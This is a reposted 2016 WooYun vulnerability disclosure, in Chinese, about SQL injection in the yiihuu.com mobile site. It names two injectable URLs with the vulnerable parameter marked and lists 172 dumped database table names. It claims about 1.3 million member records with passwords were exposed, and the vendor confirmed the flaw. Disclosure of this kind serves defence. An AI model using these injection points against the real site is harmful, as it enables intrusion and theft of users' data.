翼虎网多处注入涉及130w会员信息含密码

admin
admin
admin
105013
文章
87
评论
2017年4月25日09:21:00评论473 views字数 210阅读0分42秒阅读模式
摘要

2016-03-04: 细节已通知厂商并且等待厂商处理中
2016-03-04: 厂商已经确认,细节仅向厂商公开
2016-03-14: 细节向核心白帽子及相关领域专家公开
2016-03-24: 细节向普通白帽子公开
2016-04-03: 细节向实习白帽子公开
2016-04-18: 细节向公众公开

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2016-172945

漏洞标题: 翼虎网多处注入涉及130w会员信息含密码

相关厂商: yiihuu.com

漏洞作者: 头晕脑壳疼

提交时间: 2016-03-04 11:55

公开时间: 2016-04-18 12:08

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

1人收藏

漏洞详情

披露状态:

2016-03-04: 细节已通知厂商并且等待厂商处理中
2016-03-04: 厂商已经确认,细节仅向厂商公开
2016-03-14: 细节向核心白帽子及相关领域专家公开
2016-03-24: 细节向普通白帽子公开
2016-04-03: 细节向实习白帽子公开
2016-04-18: 细节向公众公开

简要描述:

翼虎网是以视频点播为主要特色的艺术在线学习平台,是全球首个案例。翼虎网目前设计多款图片处理相关软件,实用性比较强,堪称第一数字艺术学习社区。

详细说明:

第一处

http://m.yiihuu.com/bc/detail.php?id=32*&f=h

翼虎网多处注入涉及130w会员信息含密码

第二处

http://m.yiihuu.com/bc/detail.php?id=34

翼虎网多处注入涉及130w会员信息含密码

7个数据库

翼虎网多处注入涉及130w会员信息含密码

172个表

Database: yiihuu_db

[172 tables]

+-------------------------+

| 360_token |

| activity |

| admin |

| advertisement |

| album |

| album_chapter |

| album_copy |

| album_copy_chapter |

| album_count |

| album_extend |

| album_project |

| album_rank_month |

| album_rank_week |

| album_video |

| ask |

| ask_answer |

| ask_content |

| ask_zan |

| attention |

| baidu_push |

| book |

| book_art_tag |

| book_article |

| book_article_ext |

| book_article_temp |

| book_tag |

| business_course |

| business_order |

| card_study |

| chips |

| chips_courses |

| comment |

| comment_att |

| comment_content |

| comment_goodlog |

| comment_reply |

| courses |

| courses_attachment |

| courses_count |

| courses_extend |

| courses_homework |

| courses_homework_attr |

| courses_homework_topic |

| courses_info |

| courses_learn_progress |

| courses_live |

| courses_live_need |

| courses_manage_progress |

| courses_notice |

| courses_payback |

| courses_plan |

| courses_progress |

| courses_push |

| courses_qa |

| courses_qa_fav |

| courses_repay |

| courses_section |

| courses_step |

| courses_step_homework |

| courses_student_test |

| courses_student_work |

| courses_task |

| courses_task_comp |

| courses_test_ext |

| courses_video |

| courses_video_attr |

| coursesapply |

| courseslist |

| download |

| download_class |

| download_count |

| download_ext |

| download_log |

| edu_apply |

| email_count |

| error_reason |

| event_0410 |

| event_0421 |

| event_0509 |

| event_bless |

| event_cj |

| event_gift |

| event_gift_list |

| event_jyj |

| event_jyj_ly |

| event_lhb |

| event_lhb_extend |

| event_org |

| event_org_votelist |

| event_prize |

| event_school_msg |

| event_tejia |

| event_vip_wjdc |

| event_wx_hubi |

| event_wx_lhb |

| event_wx_menucount |

| exp_get |

| exp_op |

| fanc |

| favorites |

| filter_keyword |

| help |

| image_content |

| image_count |

| index_show |

| mail_auth |

| mail_notify |

| member |

| member_bind |

| member_bind_token |

| member_extend |

| member_filter |

| member_log |

| member_login_record |

| member_message |

| member_other |

| message |

| message_push |

| meta_custom |

| news |

| news_class |

| news_ext |

| push_action |

| push_content |

| push_msg_qq |

| quan |

| quan_ext |

| say |

| say_content |

| say_count |

| say_log |

| search_syn |

| search_word |

| send_mail |

| share |

| sign |

| sign_extend |

| sort_exp |

| sort_level |

| sort_log |

| sort_theme |

| sort_theme_2 |

| sort_tool |

| sort_tool_industry |

| space_focusimg |

| space_friendlink |

| space_group |

| space_member_info |

| space_org_news |

| space_view |

| study |

| subject |

| subject_column |

| subject_soft_content |

| subscribe |

| sys_message |

| task |

| task_member |

| task_verify_ip |

| tbl_session |

| video |

| video_bigpic |

| video_content |

| video_count |

| words |

| words_rank_month |

| words_rank_week |

| wordsset |

| wordsset_count |

| wordsset_extend |

| wordsset_list |

| wx_keyword |

+-------------------------+

大约130w会员信息

翼虎网多处注入涉及130w会员信息含密码

验证一个

翼虎网多处注入涉及130w会员信息含密码

漏洞证明:

第一处

http://m.yiihuu.com/bc/detail.php?id=32*&f=h

翼虎网多处注入涉及130w会员信息含密码

第二处

http://m.yiihuu.com/bc/detail.php?id=34

翼虎网多处注入涉及130w会员信息含密码

7个数据库

翼虎网多处注入涉及130w会员信息含密码

172个表

Database: yiihuu_db

[172 tables]

+-------------------------+

| 360_token |

| activity |

| admin |

| advertisement |

| album |

| album_chapter |

| album_copy |

| album_copy_chapter |

| album_count |

| album_extend |

| album_project |

| album_rank_month |

| album_rank_week |

| album_video |

| ask |

| ask_answer |

| ask_content |

| ask_zan |

| attention |

| baidu_push |

| book |

| book_art_tag |

| book_article |

| book_article_ext |

| book_article_temp |

| book_tag |

| business_course |

| business_order |

| card_study |

| chips |

| chips_courses |

| comment |

| comment_att |

| comment_content |

| comment_goodlog |

| comment_reply |

| courses |

| courses_attachment |

| courses_count |

| courses_extend |

| courses_homework |

| courses_homework_attr |

| courses_homework_topic |

| courses_info |

| courses_learn_progress |

| courses_live |

| courses_live_need |

| courses_manage_progress |

| courses_notice |

| courses_payback |

| courses_plan |

| courses_progress |

| courses_push |

| courses_qa |

| courses_qa_fav |

| courses_repay |

| courses_section |

| courses_step |

| courses_step_homework |

| courses_student_test |

| courses_student_work |

| courses_task |

| courses_task_comp |

| courses_test_ext |

| courses_video |

| courses_video_attr |

| coursesapply |

| courseslist |

| download |

| download_class |

| download_count |

| download_ext |

| download_log |

| edu_apply |

| email_count |

| error_reason |

| event_0410 |

| event_0421 |

| event_0509 |

| event_bless |

| event_cj |

| event_gift |

| event_gift_list |

| event_jyj |

| event_jyj_ly |

| event_lhb |

| event_lhb_extend |

| event_org |

| event_org_votelist |

| event_prize |

| event_school_msg |

| event_tejia |

| event_vip_wjdc |

| event_wx_hubi |

| event_wx_lhb |

| event_wx_menucount |

| exp_get |

| exp_op |

| fanc |

| favorites |

| filter_keyword |

| help |

| image_content |

| image_count |

| index_show |

| mail_auth |

| mail_notify |

| member |

| member_bind |

| member_bind_token |

| member_extend |

| member_filter |

| member_log |

| member_login_record |

| member_message |

| member_other |

| message |

| message_push |

| meta_custom |

| news |

| news_class |

| news_ext |

| push_action |

| push_content |

| push_msg_qq |

| quan |

| quan_ext |

| say |

| say_content |

| say_count |

| say_log |

| search_syn |

| search_word |

| send_mail |

| share |

| sign |

| sign_extend |

| sort_exp |

| sort_level |

| sort_log |

| sort_theme |

| sort_theme_2 |

| sort_tool |

| sort_tool_industry |

| space_focusimg |

| space_friendlink |

| space_group |

| space_member_info |

| space_org_news |

| space_view |

| study |

| subject |

| subject_column |

| subject_soft_content |

| subscribe |

| sys_message |

| task |

| task_member |

| task_verify_ip |

| tbl_session |

| video |

| video_bigpic |

| video_content |

| video_count |

| words |

| words_rank_month |

| words_rank_week |

| wordsset |

| wordsset_count |

| wordsset_extend |

| wordsset_list |

| wx_keyword |

+-------------------------+

大约130w会员信息

翼虎网多处注入涉及130w会员信息含密码

验证一个

翼虎网多处注入涉及130w会员信息含密码

修复方案:

版权声明:转载请注明来源 头晕脑壳疼@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-03-04 12:08

厂商回复:

确实是个重大漏洞

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin